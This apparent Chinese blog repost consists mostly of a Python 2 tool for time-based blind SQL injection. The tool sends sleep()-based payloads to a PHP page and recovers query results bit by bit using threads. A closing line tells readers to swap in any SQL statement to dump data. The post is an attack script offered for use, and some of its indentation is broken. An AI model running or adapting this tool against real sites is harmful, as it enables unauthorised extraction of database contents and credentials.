python延迟注入

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
    def __init__(self, str,x):
        threading.Thread.__init__(self)
        self.str = str
        self.x = x
    def run(self):
      global res
      x=self.x
      j = self.str
      url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
       html = request(url)
      verify = 'timeout'
      if verify not in html:
        res[str(j)] = 0
        #print 1
      else:
        res[str(j)] = 1


def request(URL):
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
   req = urllib2.Request(URL, None, user_agent)
  try:
    request = urllib2.urlopen(req,timeout=2)
  except Exception ,e:
    time.sleep(2)
    return 'timeout'
  return request.read()

def curl(url):
  try:
      start = time.clock()
      requests.get(url)
      end = time.clock()
      return int(end)
  except requests.RequestException as e:
      print u"访问出错!"
      exit()
def getLength():
  i = 0
  while True:
    print "[+] Checking: %s r" %i
    url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
     html = request(url)
    verify = 'timeout'
    if verify in html:
      print u"[+] 数据长度为： %s" %i
      return i

    i = i + 1
def bin2dec(string_num):
  return int(string_num, 2)

def getData(dataLength):
  global res
  data = ""
  for x in range(dataLength):
    x = x + 1
    #print x
    threads = []
    for j in range(8):
      result = ""
      j = j + 1
      sb = my_threading(j,x)
      sb.setDaemon(True)
      threads.append(sb)
      #print j
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    #print res
    tmp = ""
    for i in range(8):
      tmp = tmp + str(res[str(i+1)])
    #print chr(bin2dec(tmp))
    res = {}
    result = chr(bin2dec(tmp))
    print result
    data = data + result
    sb = None
  print "[+] ok!"
  print "[+] result:" + data


if __name__ == '__main__':
  stop = False
  res = {}
  length = getLength()
  getData(length)

1.php

如果要爆数据啥的话就改py代码里面的select%20user()，替换为你要执行的sql即可

[原文地址] 

文章来源于lcx.cc:python延迟注入

相关推荐: 大型软件公司是如何防止员工在软件、源码中加后门？

大型软件公司是如何防止员工在软件、源码中加后门？ 核攻击 (统治全球，奴役全人类！毁灭任何胆敢阻拦的有机生物！) | 2014-01-11 08:49 rt [原文地址] 相关讨论： 1# RedFree (?1:1 1-1-1112 |※(器杀制自) | 2…